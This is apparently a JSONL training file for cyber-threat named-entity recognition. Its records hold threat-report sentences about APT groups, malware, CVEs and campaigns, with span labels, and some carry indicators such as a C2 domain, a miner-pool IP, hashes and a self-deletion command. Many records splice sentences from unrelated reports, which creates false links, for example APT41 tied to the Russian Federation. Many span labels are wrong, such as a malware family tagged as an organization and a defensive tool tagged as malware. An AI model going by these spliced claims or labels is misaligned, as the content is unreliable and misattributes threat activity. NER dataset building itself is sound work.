{"text": "] net . As Proofpoint has not yet observed this attack in the wild it is likely that there is an additional component that leads to the execution of the MSIL payload . FireEye said it has tracked admin@338 's activity since 2013 and the group has largely targeted organizations involved in financial , economic , and trade policy .", "spans": {"ORGANIZATION: Proofpoint": [[11, 21]], "MALWARE: MSIL payload": [[153, 165]], "ORGANIZATION: FireEye": [[168, 175]], "THREAT_ACTOR: admin@338": [[196, 205]], "ORGANIZATION: financial": [[290, 299]], "ORGANIZATION: economic": [[302, 310]], "ORGANIZATION: trade policy": [[317, 329]]}, "info": {"id": "cyberner_stix_train_003724", "source": "cyberner_stix_train"}}
{"text": "] com also registered six other domains . Before attempting to deploy the publicly available Ransomware-as-a-Service (RaaS) Encryptor RaaS through group policy , APT41 blocked victim systems from retrieving anti-virus updates by accessing the DNS management console and implementing a forward lookup on the domain used for anti-virus updates to the park IP address 1.1.1.1 . All of the available evidence however does in our opinion suggest that the group operates on behalf of the Russian Federation .", "spans": {"THREAT_ACTOR: APT41": [[162, 167]]}, "info": {"id": "cyberner_stix_train_003725", "source": "cyberner_stix_train"}}
{"text": "In previous incidents involving this threat actor , we observed them using malicious documents hosted on websites about the Indian Army , instead of sending these documents directly as an email attachment . They have also been seen using Heartbleed vulnerability in order to directly get valid credentials .", "spans": {"ORGANIZATION: Indian Army": [[124, 135]], "VULNERABILITY: Heartbleed vulnerability": [[238, 262]]}, "info": {"id": "cyberner_stix_train_003726", "source": "cyberner_stix_train"}}
{"text": "These breaches involved the theft of internal data - mostly emails – that was later strategically leaked through multiple forums and propagated in a calculated manner almost certainly intended to advance particular Russian Government aims .", "spans": {"TOOL: emails": [[60, 66]]}, "info": {"id": "cyberner_stix_train_003727", "source": "cyberner_stix_train"}}
{"text": "Specifically , Suckfly used a specially crafted web page to deliver an exploit for the Microsoft Windows OLE Remote Code Execution Vulnerability ( CVE-2014-6332 ) , which affects specific versions of Microsoft Windows . In April Novetta released its excellent report on the Winnti malware spotted in the operations of Axiom group .", "spans": {"VULNERABILITY: Microsoft Windows OLE Remote Code Execution Vulnerability": [[87, 144]], "VULNERABILITY: CVE-2014-6332": [[147, 160]], "ORGANIZATION: Novetta": [[229, 236]], "MALWARE: Winnti": [[274, 280]], "MALWARE: malware": [[281, 288]]}, "info": {"id": "cyberner_stix_train_003728", "source": "cyberner_stix_train"}}
{"text": "After all network derived IPs have been processed , the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to that host . Just recently , PIVY was the payload of a zero-day exploit in Internet Explorer used in what is known as a \" strategic web compromise \" attack against visitors to a U.S. government website and a variety of others .", "spans": {"MALWARE: malware": [[56, 63]], "MALWARE: PingCastle": [[118, 128]], "MALWARE: EternalBlue": [[133, 144]], "MALWARE: PIVY": [[186, 190]], "VULNERABILITY: zero-day": [[212, 220]], "VULNERABILITY: exploit": [[221, 228]]}, "info": {"id": "cyberner_stix_train_003729", "source": "cyberner_stix_train"}}
{"text": "The code is not only obfuscated but also packed . APT10 's malware toolbox shows a clear evolution from malware commonly associated with China-based threat actors towards bespoke in-house malware that has been used in more recent campaigns ; this is indicative of APT10 's increasing sophistication , which is highly likely to continue . BARIUM is an APT actor known to be using the Winnti backdoor . Its wellknown that ransomware can be delivered via unremediated vulnerabilities , but many security teams are overwhelmed by the sheer number they are facing .", "spans": {"THREAT_ACTOR: APT10": [[50, 55], [264, 269]], "THREAT_ACTOR: threat actors": [[149, 162]], "THREAT_ACTOR: BARIUM": [[338, 344]], "MALWARE: Winnti backdoor": [[383, 398]], "MALWARE: ransomware": [[420, 430]]}, "info": {"id": "cyberner_stix_train_003730", "source": "cyberner_stix_train"}}
{"text": "The server sends a command . for example , “ Get System Information ” .", "spans": {"FILEPATH: Get System Information": [[45, 67]]}, "info": {"id": "cyberner_stix_train_003731", "source": "cyberner_stix_train"}}
{"text": "Hackers use the exploits \" Nitris Exploit Kit \" ( earlier known as CottonCastle ) , which is not available in open sources and sold only to trusted users . In addition to maritime operations in this region , Anchor Panda also heavily targeted western companies in the US , Germany , Sweden , the UK , and Australia , and other countries involved in maritime satellite systems , aerospace companies , and defense contractors .", "spans": {"VULNERABILITY: Nitris Exploit Kit": [[27, 45]], "VULNERABILITY: CottonCastle": [[67, 79]], "ORGANIZATION: aerospace companies": [[378, 397]], "ORGANIZATION: defense contractors": [[404, 423]]}, "info": {"id": "cyberner_stix_train_003732", "source": "cyberner_stix_train"}}
{"text": "The loader has a very simple purpose , extract and run the “ core ” module of “ Agent Smith ” . The actors appear to follow a set playbook , as the observed TTPs are fairly static within each attack in this campaign . During the execution stage , Dexphot writes five key files to disk : Proxy : Domain Fronting APT29 has used the meek domain fronting plugin for Tor to hide the destination of C2 traffic.007 Remote Services : Cloud Services APT29 has leveraged compromised high - privileged on - premises accounts synced to Office 365 to move laterally into a cloud environment , including through the use of Azure AD PowerShell .", "spans": {"MALWARE: Agent Smith": [[80, 91]], "THREAT_ACTOR: Domain Fronting APT29": [[295, 316]], "SYSTEM: Remote Services": [[408, 423]], "THREAT_ACTOR: Cloud Services APT29": [[426, 446]], "SYSTEM: Azure AD PowerShell": [[609, 628]]}, "info": {"id": "cyberner_stix_train_003733", "source": "cyberner_stix_train"}}
{"text": "That this group is mostly targeting businesses is apparent from the processes they are looking for on a compromised system . FrozenCell masquerades as fake updates to chat applications like Facebook , WhatsApp , Messenger , LINE , and LoveChat .", "spans": {"THREAT_ACTOR: group": [[10, 15]], "ORGANIZATION: businesses": [[36, 46]], "MALWARE: FrozenCell masquerades": [[125, 147]], "ORGANIZATION: Facebook": [[190, 198]], "ORGANIZATION: WhatsApp": [[201, 209]], "ORGANIZATION: Messenger": [[212, 221]], "ORGANIZATION: LINE": [[224, 228]], "ORGANIZATION: LoveChat": [[235, 243]]}, "info": {"id": "cyberner_stix_train_003734", "source": "cyberner_stix_train"}}
{"text": "Those are not the only system functions Triada modifies . The ScarCruft APT gang has made use of a Flash zero day patched Thursday by Adobe to attack more than two dozen high-profile targets in Russia and Asia primarily . The mydomain1110.com domain did not appear to reuse any of the previously observed WHOIS data artifacts , but did still give a geolocation of Tehran in addition to the use of an email address linked to other domains thematically similar to the know command and control domains and are potentially related .", "spans": {"MALWARE: Triada": [[40, 46]], "VULNERABILITY: Flash zero day": [[99, 113]], "TOOL: email": [[400, 405]]}, "info": {"id": "cyberner_stix_train_003735", "source": "cyberner_stix_train"}}
{"text": "Figure 3 : Loading core malicious code into the benign application Once the “ core ” module is extracted and loaded , the “ loader ” uses the reflection technique to initialize and start the “ core ” module . Malicious programs intentionally scan for machines with an automated Bank-Customer system of the Central bank of Russia ( further referred to as BCS CBR ) . This can make detection and remediation more difficult . Enterprise T1199 Trusted Relationship APT29 has compromised IT , cloud services , and managed services providers to gain broad access to multiple customers for subsequent operations .", "spans": {"ORGANIZATION: bank": [[314, 318]], "THREAT_ACTOR: Trusted Relationship APT29": [[440, 466]], "SYSTEM: IT": [[483, 485]], "SYSTEM: cloud services": [[488, 502]], "SYSTEM: managed services providers": [[509, 535]]}, "info": {"id": "cyberner_stix_train_003736", "source": "cyberner_stix_train"}}
{"text": "In addition to known generic malware ( such as : njRAT , Poison Ivy , XtremeRAT ) , the MoleRATs group has been known to develop its own custom tools such as DustySky , the MoleRAT Loader and Scote .", "spans": {"MALWARE: njRAT": [[49, 54]], "MALWARE: Poison Ivy": [[57, 67]], "MALWARE: XtremeRAT": [[70, 79]], "THREAT_ACTOR: MoleRATs": [[88, 96]], "MALWARE: DustySky": [[158, 166]], "MALWARE: MoleRAT": [[173, 180]], "MALWARE: Scote": [[192, 197]]}, "info": {"id": "cyberner_stix_train_003737", "source": "cyberner_stix_train"}}
{"text": "We did not actively check each server to verify if they were indeed vulnerable , so it is possible that many of these public-facing SharePoint servers were not vulnerable or since patched .", "spans": {"TOOL: SharePoint": [[132, 142]]}, "info": {"id": "cyberner_stix_train_003738", "source": "cyberner_stix_train"}}
{"text": "One example of the new Sofacy USBSTEALER modules is 8b238931a7f64fddcad3057a96855f6c , which is named internally as msdetltemp.dll .", "spans": {"THREAT_ACTOR: Sofacy": [[23, 29]], "TOOL: USBSTEALER": [[30, 40]], "FILEPATH: 8b238931a7f64fddcad3057a96855f6c": [[52, 84]], "FILEPATH: msdetltemp.dll": [[116, 130]]}, "info": {"id": "cyberner_stix_train_003739", "source": "cyberner_stix_train"}}
{"text": "Allwinner has also been less transparent about the backdoor code . As of this publication , BRONZE UNION remains a formidable threat group that targets intellectual property and executes its operations at a swift pace . We found a new variant of the ShadowPad backdoor , the group ’s flagship backdoor , deployed using a new launcher and embedding numerous modules . This convinced the user it was safe to download files once logged in .", "spans": {"ORGANIZATION: Allwinner": [[0, 9]], "MALWARE: ShadowPad backdoor": [[250, 268]], "MALWARE: backdoor": [[293, 301]]}, "info": {"id": "cyberner_stix_train_003740", "source": "cyberner_stix_train"}}
{"text": "Shamoon2 : analytics-google.org .", "spans": {"MALWARE: Shamoon2": [[0, 8]], "DOMAIN: analytics-google.org": [[11, 31]]}, "info": {"id": "cyberner_stix_train_003741", "source": "cyberner_stix_train"}}
{"text": "These strings , which are generated by the compiler when using specific compilation settings , means that the components of the exploits used with MiniDuke had to have been compiled independently from those described by FireEye .", "spans": {"MALWARE: MiniDuke": [[147, 155]], "ORGANIZATION: FireEye": [[220, 227]]}, "info": {"id": "cyberner_stix_train_003743", "source": "cyberner_stix_train"}}
{"text": "] com hxxp : //mailsa-qau [ . APT28 targets Russian rockers and dissidents Pussy Riot via spear-phishing emails . Many of the capabilities discovered in Glimpse were also present in the malware analyzed in part one of this . It seems that the legitimate macro code is used to calculate some values in the spreadsheets , but the legitimate functions are changed to call the function that starts the infection process .", "spans": {"THREAT_ACTOR: APT28": [[30, 35]], "ORGANIZATION: rockers": [[52, 59]], "ORGANIZATION: dissidents": [[64, 74]], "MALWARE: Glimpse": [[153, 160]]}, "info": {"id": "cyberner_stix_train_003744", "source": "cyberner_stix_train"}}
{"text": "Figure 1 : Landing page for phishing scheme asking for the victim ’ s signatory number and PIN using stolen branding from Bank Austria Because the actor delivered phishing links using the bit.ly URL shortener , we can access delivery statistics for this particular campaign . The Department of Homeland Security (DHS) issued an alert about this activity on Jan. 24 2019 , warning that an attacker could redirect user traffic and obtain valid encryption certificates for an organization's domain names . The group uses stolen data exfiltrated from victims to extort organizations .", "spans": {"SYSTEM: Bank Austria": [[122, 134]], "ORGANIZATION: (DHS)": [[312, 317]]}, "info": {"id": "cyberner_stix_train_003745", "source": "cyberner_stix_train"}}
{"text": "Charger , however , uses a heavy packing approach which it harder for the malware to stay hidden , so it must compensate with other means . The infection vector is a spear-phishing email with a malicious attachment . Distribution of targets is another factor suggesting that these two malware families may be connected . Our demonstration shows how using the Google Analytics API , a web skimmer can send data to be collected in his own account instance .", "spans": {"MALWARE: Charger": [[0, 7]], "SYSTEM: Google Analytics API": [[359, 379]], "THREAT_ACTOR: a web skimmer": [[382, 395]]}, "info": {"id": "cyberner_stix_train_003746", "source": "cyberner_stix_train"}}
{"text": "Conclusion The case of Asacub shows that mobile malware can function for several years with minimal changes to the distribution scheme . After reestablishing access , the adversaries download tools such as gsecudmp and WCE that are staged temporarily on websites that TG-3390 previously compromised but never used . Legacy system users may use their providers ’ virtual patches . It now appears those attacks were perpetrated by Harrison , who sent emails from different accounts at the free email service Vistomail pretending to be Bradshaw , his then - girlfriend and their friends .", "spans": {"MALWARE: Asacub": [[23, 29]], "TOOL: gsecudmp": [[206, 214]], "TOOL: WCE": [[219, 222]], "THREAT_ACTOR: TG-3390": [[268, 275]], "THREAT_ACTOR: Harrison": [[429, 437]]}, "info": {"id": "cyberner_stix_train_003747", "source": "cyberner_stix_train"}}
{"text": "This Windows malware loads the encrypted msctfp.dat file in a system folder , and loads each configuration value .", "spans": {"SYSTEM: Windows": [[5, 12]], "FILEPATH: msctfp.dat": [[41, 51]]}, "info": {"id": "cyberner_stix_train_003748", "source": "cyberner_stix_train"}}
{"text": "Earworm has also on occasion installed additional tools onto infected computers for the purposes of keylogging and password capture .", "spans": {"THREAT_ACTOR: Earworm": [[0, 7]]}, "info": {"id": "cyberner_stix_train_003749", "source": "cyberner_stix_train"}}
{"text": "The local privileges escalation backdoor code for debugging ARM-powered Android devices managed to make its way in shipped firmware after firmware makers wrote their own kernel code underneath a custom Android build for their devices , though the mainstream kernel source is unaffected . BRONZE UNION appears to use a combination of self-registered IP addresses and commercial VPN services in its command and control ( C2 ) and operational infrastructure . Outlaw : 45.9.148.129:80 Miner pool . Threat actors are always looking to expand the strategies they use , thus security practices and solutions that work for less organized cybercriminals might not work for determined groups who are willing to spend time , resources and manpower to accomplish their goals .", "spans": {"SYSTEM: ARM-powered": [[60, 71]], "SYSTEM: Android": [[72, 79], [202, 209]], "THREAT_ACTOR: Outlaw": [[457, 463]], "IP_ADDRESS: 45.9.148.129:80": [[466, 481]], "TOOL: Miner pool": [[482, 492]], "THREAT_ACTOR: Threat actors": [[495, 508]]}, "info": {"id": "cyberner_stix_train_003750", "source": "cyberner_stix_train"}}
{"text": "We have been unable to identify the infection vectors used for this second botnet , but the C&C servers it used had open directory listings , allowing us to retrieve files containing listings of victim IP addresses .", "spans": {"TOOL: C&C": [[92, 95]]}, "info": {"id": "cyberner_stix_train_003751", "source": "cyberner_stix_train"}}
{"text": "Finally , the program removes itself by starting the following command : “ cmd /c DEL %path to self% “ The MD5 of the dropped file is f6f88caf49a3e32174387cacfa144a89 .", "spans": {"TOOL: cmd": [[75, 78]], "FILEPATH: f6f88caf49a3e32174387cacfa144a89": [[134, 166]]}, "info": {"id": "cyberner_stix_train_003752", "source": "cyberner_stix_train"}}
{"text": "PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . To further exemplify the proficiency of the attackers leveraging the Lamberts toolkit , deployment of Black Lambert included a rather sophisticated TTF zero day exploit , CVE-2014-4148 .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "VULNERABILITY: zero-day exploits": [[143, 160]], "MALWARE: Lamberts toolkit": [[271, 287]], "MALWARE: Black Lambert": [[304, 317]], "VULNERABILITY: zero day": [[354, 362]], "VULNERABILITY: exploit": [[363, 370]], "VULNERABILITY: CVE-2014-4148": [[373, 386]]}, "info": {"id": "cyberner_stix_train_003753", "source": "cyberner_stix_train"}}
{"text": "It is still under active development , with at least 5 different versions of the Trojan released within the last 5 months ( June - November 2019 ) . The CIA's Remote Devices Branch's UMBRAGE group collects and maintains a substantial library of attack techniques 'stolen' from malware produced in other states including the Russian Federation . There is debate over the extent of the overlap between Dragonfly and Dragonfly 2.0 , but there is sufficient evidence to lead to these being tracked as two separate groups .", "spans": {"THREAT_ACTOR: CIA's": [[153, 158]], "THREAT_ACTOR: UMBRAGE": [[183, 190]], "THREAT_ACTOR: Dragonfly": [[400, 409]], "THREAT_ACTOR: Dragonfly 2.0": [[414, 427]]}, "info": {"id": "cyberner_stix_train_003754", "source": "cyberner_stix_train"}}
{"text": "Figure 2: Zyklon attack flowInfection Techniques CVE-2017-8759 . In fact , REDBALDKNIGHT has been zeroing in on Japanese organizations as early as 2008 — at least based on the file properties of the decoy documents they've been sending to their targets .", "spans": {"THREAT_ACTOR: Zyklon": [[10, 16]], "VULNERABILITY: CVE-2017-8759": [[49, 62]], "THREAT_ACTOR: REDBALDKNIGHT": [[75, 88]], "FILEPATH: decoy documents": [[199, 214]]}, "info": {"id": "cyberner_stix_train_003755", "source": "cyberner_stix_train"}}
{"text": "This section contains the details of the c2 domain ( khanji.ddns.net ) .", "spans": {"TOOL: c2": [[41, 43]], "DOMAIN: khanji.ddns.net": [[53, 68]]}, "info": {"id": "cyberner_stix_train_003756", "source": "cyberner_stix_train"}}
{"text": "Monitoring the command and control ( C & C ) servers used by Bouncing Golf , we ’ ve so far observed more than 660 Android devices infected with GolfSpy . Beginning in 2009 , we've observed this actor conduct more than 40 unique campaigns that we've identified in the malware configurations' campaign codes . On August 1, 2018 , the US Department of Justice announced that it had arrested several individuals suspected of having ties to the FIN7 cybercrime rig . The attackers work from computers with Chinese and Korean language configurations .", "spans": {"MALWARE: Bouncing Golf": [[61, 74]], "SYSTEM: Android": [[115, 122]], "MALWARE: GolfSpy": [[145, 152]], "ORGANIZATION: Department of Justice": [[336, 357]], "THREAT_ACTOR: FIN7": [[441, 445]], "THREAT_ACTOR: attackers": [[467, 476]], "SYSTEM: computers with Chinese and Korean language configurations": [[487, 544]]}, "info": {"id": "cyberner_stix_train_003757", "source": "cyberner_stix_train"}}
{"text": "In order to establish remote tunneling , the actor delivered more tools , executing with command-line parameters .", "spans": {}, "info": {"id": "cyberner_stix_train_003758", "source": "cyberner_stix_train"}}
{"text": "To further exemplify the proficiency of the attackers leveraging the Lamberts toolkit , deployment of Black Lambert included a rather sophisticated TTF zero day exploit , CVE-2014-4148 . Dragos does not corroborate nor conduct political attribution to threat activity .", "spans": {"TOOL: Lamberts toolkit": [[69, 85]], "TOOL: Black Lambert": [[102, 115]], "VULNERABILITY: zero day exploit": [[152, 168]], "VULNERABILITY: CVE-2014-4148": [[171, 184]], "ORGANIZATION: Dragos": [[187, 193]]}, "info": {"id": "cyberner_stix_train_003759", "source": "cyberner_stix_train"}}
{"text": "Similarly , the group takes advantage of freely available consolidations of email credentials , personal information , and other data shared in eCrime forums for fraud purposes . PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 .", "spans": {"THREAT_ACTOR: group": [[16, 21]], "TOOL: email credentials": [[76, 93]], "TOOL: personal information": [[96, 116]], "MALWARE: PIVY": [[179, 183], [445, 449]], "ORGANIZATION: chemical makers": [[257, 272]], "ORGANIZATION: government agencies": [[275, 294]], "ORGANIZATION: defense contractors": [[297, 316]], "THREAT_ACTOR: attackers": [[387, 396]], "VULNERABILITY: zero-day": [[404, 412]]}, "info": {"id": "cyberner_stix_train_003760", "source": "cyberner_stix_train"}}
{"text": "SHA256 9a8d73cb7069832b9523c55224ae4153ea529ecc50392fef59da5b5d1db1c740 .", "spans": {"FILEPATH: 9a8d73cb7069832b9523c55224ae4153ea529ecc50392fef59da5b5d1db1c740": [[7, 71]]}, "info": {"id": "cyberner_stix_train_003761", "source": "cyberner_stix_train"}}
{"text": "The high infection rate for this target is likely because of its access to technology and information related to other Indian government organizations .", "spans": {}, "info": {"id": "cyberner_stix_train_003762", "source": "cyberner_stix_train"}}
{"text": "The Pitty Tiger group mostly uses spear phishing in order to gain an initial foothold within the targeted environment . These threats are capable of opening a back door and stealing information from victims' computers .", "spans": {"THREAT_ACTOR: Pitty Tiger group": [[4, 21]]}, "info": {"id": "cyberner_stix_train_003763", "source": "cyberner_stix_train"}}
{"text": "South Korea nexus Fallout Team ( aka Darkhotel ) has used spoofed software updates on infected Wi-Fi networks in Asian hotels , and Duqu 2.0 malware has been found on the networks of European hotels used by participants in the Iranian nuclear negotiations .", "spans": {"THREAT_ACTOR: Fallout Team": [[18, 30]], "THREAT_ACTOR: Darkhotel": [[37, 46]], "TOOL: Wi-Fi networks": [[95, 109]], "MALWARE: Duqu 2.0": [[132, 140]]}, "info": {"id": "cyberner_stix_train_003764", "source": "cyberner_stix_train"}}
{"text": "Truvasys is a collection of modules written in the Delphi programming language , a variant of Pascal . Like BlackEnergy ( a.k.a. Sandworm , Quedagh ) , Potao is an example of targeted espionage ( APT ) malware detected mostly in Ukraine and a number of other CIS countries , including Russia , Georgia and Belarus .", "spans": {"TOOL: Truvasys": [[0, 8]], "TOOL: Pascal": [[94, 100]], "MALWARE: BlackEnergy": [[108, 119]], "THREAT_ACTOR: Sandworm": [[129, 137]], "THREAT_ACTOR: Quedagh": [[140, 147]], "MALWARE: Potao": [[152, 157]]}, "info": {"id": "cyberner_stix_train_003765", "source": "cyberner_stix_train"}}
{"text": "While not conclusive , it is intriguing that the same IP was observed hosting a domain ostensibly registered in Gaza AND the command and control domain associated with a series of targeted attacks leveraging Palestinian Authority -themed decoy documents referencing Gaza .", "spans": {"ORGANIZATION: Palestinian Authority": [[208, 229]]}, "info": {"id": "cyberner_stix_train_003766", "source": "cyberner_stix_train"}}
{"text": "Some were only 3 bytes long , containing strings such as “ ddd ” and “ 333 ” , or were otherwise corrupted . Thanks to this tool , we found out back in March 2019 that the Bayer pharmaceutical group had been hacked by Winnti . The suspected APT16 targeting of the Taiwanese government agency – in addition to the Taiwanese media organizations – further supports this possibility .", "spans": {"ORGANIZATION: Bayer pharmaceutical": [[172, 192]], "THREAT_ACTOR: Winnti": [[218, 224]], "THREAT_ACTOR: APT16": [[241, 246]], "ORGANIZATION: government agency": [[274, 291]], "ORGANIZATION: media organizations": [[323, 342]]}, "info": {"id": "cyberner_stix_train_003767", "source": "cyberner_stix_train"}}
{"text": "XLoader Android Spyware and Banking Trojan Distributed via DNS Spoofing We have been detecting a new wave of network attacks since early March , which , for now , are targeting Japan , Korea , China , Taiwan , and Hong Kong . The 360 Intelligence Center observed four distinct campaigns against Pakistan since 2017 (link) , recently targeting Pakistani businessmen working in China . To understand its capabilities , the macro code has been isolated and analyzed in detail .", "spans": {"MALWARE: XLoader": [[0, 7]], "SYSTEM: Android": [[8, 15]], "ORGANIZATION: Pakistani businessmen": [[343, 364]], "TOOL: macro": [[421, 426]]}, "info": {"id": "cyberner_stix_train_003768", "source": "cyberner_stix_train"}}
{"text": "Banks in countries such as Russia , the United Kingdom , the Netherlands , Spain , Romania , Belarus , Poland , Estonia , Bulgaria , Georgia , Moldova , Kyrgyzstan , Armenia , Taiwan and Malaysia have allegedly been targeted with spearphishing emails , luring victims into clicking malicious URLs and executing booby-trapped documents . This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) .", "spans": {"ORGANIZATION: Banks": [[0, 5]], "MALWARE: spearphishing emails": [[230, 250]], "TOOL: emails": [[403, 409]], "FILEPATH: Microsoft Word attachment": [[417, 442]], "VULNERABILITY: CVE-2017-0199": [[475, 488]], "MALWARE: ZeroT Trojan": [[503, 515]], "MALWARE: PlugX Remote Access Trojan": [[547, 573]], "MALWARE: RAT": [[576, 579]]}, "info": {"id": "cyberner_stix_train_003769", "source": "cyberner_stix_train"}}
{"text": "Traps blocks the macro-ladened remote templates as Suspicious macro detected , as well as Zebrocy and Cannon payloads as Suspicious executable detected .", "spans": {"TOOL: macro": [[62, 67]], "MALWARE: Zebrocy": [[90, 97]], "MALWARE: Cannon": [[102, 108]]}, "info": {"id": "cyberner_stix_train_003770", "source": "cyberner_stix_train"}}
{"text": "Some of the settings include : The URL of the C & C server Service wake-up intervals Important package names Accessibility permissions status Lockdown screen status Recording status SMS app status Kill switch status Stealth To keep its resources safer and make analysis more difficult for researchers , TrickMo uses an obfuscator to scramble the names of its functions , classes and variables . DarkPulsar is a very interesting administrative module for controlling a passive backdoor named ' sipauth32.tsp ' that provides remote control , belonging to this category . Additionally , HELIX KITTEN actors have shown an affinity for creating thoroughly researched and structured spear-phishing messages relevant to the interests of targeted personnel .", "spans": {"MALWARE: TrickMo": [[303, 310]], "TOOL: DarkPulsar": [[395, 405]], "TOOL: backdoor": [[476, 484]], "MALWARE: sipauth32.tsp": [[493, 506]], "THREAT_ACTOR: HELIX KITTEN actors": [[584, 603]], "ORGANIZATION: personnel": [[739, 748]]}, "info": {"id": "cyberner_stix_train_003771", "source": "cyberner_stix_train"}}
{"text": "The files exploit the well-known Microsoft Office vulnerability , CVE-2012-0158 , to execute malicious code in order to take control of the targeted systems . In particular , TG-3390 has exploited CVE-2011-3544 , a vulnerability in the Java Runtime Environment , to deliver the HTTPBrowser backdoor ; and CVE-2010-0738 , a vulnerability in JBoss , to compromise internally and externally accessible assets used to redirect users' web browsers to exploit code .", "spans": {"MALWARE: files": [[4, 9]], "VULNERABILITY: Microsoft Office vulnerability": [[33, 63]], "VULNERABILITY: CVE-2012-0158": [[66, 79]], "THREAT_ACTOR: TG-3390": [[175, 182]], "VULNERABILITY: CVE-2011-3544": [[197, 210]], "MALWARE: HTTPBrowser backdoor": [[278, 298]], "VULNERABILITY: CVE-2010-0738": [[305, 318]], "MALWARE: JBoss": [[340, 345]], "VULNERABILITY: exploit": [[446, 453]]}, "info": {"id": "cyberner_stix_train_003772", "source": "cyberner_stix_train"}}
{"text": "During the investigations , Mandiant observed that FIN7 used a custom shim database to patch both the 32-bit and 64-bit versions of services.exe with their CARBANAK payload . The admin@338 previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences .", "spans": {"ORGANIZATION: Mandiant": [[28, 36]], "THREAT_ACTOR: FIN7": [[51, 55]], "MALWARE: services.exe": [[132, 144]], "TOOL: CARBANAK": [[156, 164]], "THREAT_ACTOR: admin@338": [[179, 188]], "ORGANIZATION: financial": [[217, 226]], "ORGANIZATION: policy organizations": [[231, 251]], "TOOL: emails": [[291, 297]], "ORGANIZATION: audiences": [[340, 349]]}, "info": {"id": "cyberner_stix_train_003773", "source": "cyberner_stix_train"}}
{"text": "Reverse engineering both the word documents ( Uri Terror Report.doc & mha-report.doc ) exhibited similar behaviour except the minor difference mentioned below .", "spans": {"FILEPATH: Uri Terror Report.doc": [[46, 67]], "FILEPATH: mha-report.doc": [[70, 84]]}, "info": {"id": "cyberner_stix_train_003774", "source": "cyberner_stix_train"}}
{"text": "Each bitmap resource is extracted , stripped of the first 0x428 bytes ( BMP headers and garbage data ) , and combined into one file . Additionally , there is evidence to suggest APT33 targeted Saudi Arabia . Features : The executable within this not only played a very funny video , but dropped and ran another CozyDuke executable .", "spans": {"THREAT_ACTOR: APT33": [[178, 183]]}, "info": {"id": "cyberner_stix_train_003775", "source": "cyberner_stix_train"}}
{"text": "Kazuar generates its mutex by using a process that begins with obtaining the MD5 hash of a string \" [username]=>singleton-instance-mutex \" . Moreover , they used the same exploit kit Niteris as that in the Corkow case .", "spans": {"ORGANIZATION: Kazuar": [[0, 6]], "VULNERABILITY: exploit": [[171, 178]], "VULNERABILITY: kit Niteris": [[179, 190]], "MALWARE: Corkow": [[206, 212]]}, "info": {"id": "cyberner_stix_train_003776", "source": "cyberner_stix_train"}}
{"text": "Some anti-virus products can limit execution to only the highest reputation files , stopping a wide range of untrustworthy code from gaining control .", "spans": {}, "info": {"id": "cyberner_stix_train_003777", "source": "cyberner_stix_train"}}
{"text": "Before Google shut it down , it installed more than 50,000 fraudulent apps each day , displayed 20 million malicious advertisements , and generated more than $ 300,000 per month in revenue . Evidence suggest that the Lazarus Group uses compromised infrastructure as the public-facing touchpoint for the majority of their malware samples . Elfin came under the spotlight in December 2018 when it was linked with a new wave of Shamoon attacks . This string is the schema that will be filled with the victim info , decoding this string will give us the following .", "spans": {"ORGANIZATION: Google": [[7, 13]], "THREAT_ACTOR: Lazarus Group": [[217, 230]], "TOOL: compromised infrastructure": [[236, 262]], "THREAT_ACTOR: Elfin": [[339, 344]], "THREAT_ACTOR: Shamoon": [[425, 432]]}, "info": {"id": "cyberner_stix_train_003778", "source": "cyberner_stix_train"}}
{"text": "One of the most significant features TrickMo possesses is the app recording feature , which is what gives TrickBot the ability to overcome the newer pushTAN app validations deployed by banks . As previously mentioned , we assess with high confidence that APT38 's mission is focused on targeting financial institutions to raise money for the North Korean regime . these attacks were part of a planned operation against specific targets in India .", "spans": {"MALWARE: TrickMo": [[37, 44]], "MALWARE: TrickBot": [[106, 114]], "THREAT_ACTOR: APT38": [[255, 260]], "ORGANIZATION: financial institutions": [[296, 318]]}, "info": {"id": "cyberner_stix_train_003779", "source": "cyberner_stix_train"}}
{"text": "Hermes is commodity ransomware that has been observed for sale on forums and used by multiple threat actors . Next , in an effort to demonstrate it wasn't relegated to China , we exposed Clever Kitten , an actor we track out of Iran who leverages some very distinct TTPs when viewed next to a more visible adversary .", "spans": {"TOOL: Hermes": [[0, 6]]}, "info": {"id": "cyberner_stix_train_003780", "source": "cyberner_stix_train"}}
{"text": "By going on the offensive and hunting the attackers , our team was able to unearth the early stages of what may be a very dangerous mobile malware . Around the same time , WildFire also captured an e-mail containing a Word document ( \" hello.docx \" ) with an identical hash as the earlier Word document , this time sent to a U.S. Government recipient . The group 's spearphish toolset includes PDF exploits , Adobe Flash Player exploits , and the common CVE-2012-0158 Word exploits including those generated from the infamous \" Tran Duy Linh \" kit .", "spans": {"ORGANIZATION: WildFire": [[172, 180]], "MALWARE: Word document": [[218, 231], [289, 302]], "MALWARE: hello.docx": [[236, 246]], "TOOL: PDF": [[394, 397]], "VULNERABILITY: exploits": [[398, 406], [428, 436], [473, 481]], "TOOL: Adobe Flash Player": [[409, 427]], "VULNERABILITY: CVE-2012-0158": [[454, 467]], "TOOL: Word": [[468, 472]], "MALWARE: Tran Duy Linh": [[528, 541]]}, "info": {"id": "cyberner_stix_train_003781", "source": "cyberner_stix_train"}}
{"text": "The first timer will be fired on the configured interval ( 20 seconds in this case ) , pinging the command and control ( C2 ) server . In addition , the anonymous cybersecurity experts referenced in the article connected the malicious Gamaredon Group actors with Russian state-sponsored hackers . It is possible that APT37 's distribution of KARAE malware via torrent websites could assist in creating and maintaining botnets for future distributed denial-of-service ( DDoS ) attacks , or for other activity such as financially motivated campaigns or disruptive operations .", "spans": {"THREAT_ACTOR: Gamaredon Group": [[235, 250]], "THREAT_ACTOR: APT37": [[317, 322]], "MALWARE: KARAE": [[342, 347]], "MALWARE: malware": [[348, 355]]}, "info": {"id": "cyberner_stix_train_003782", "source": "cyberner_stix_train"}}
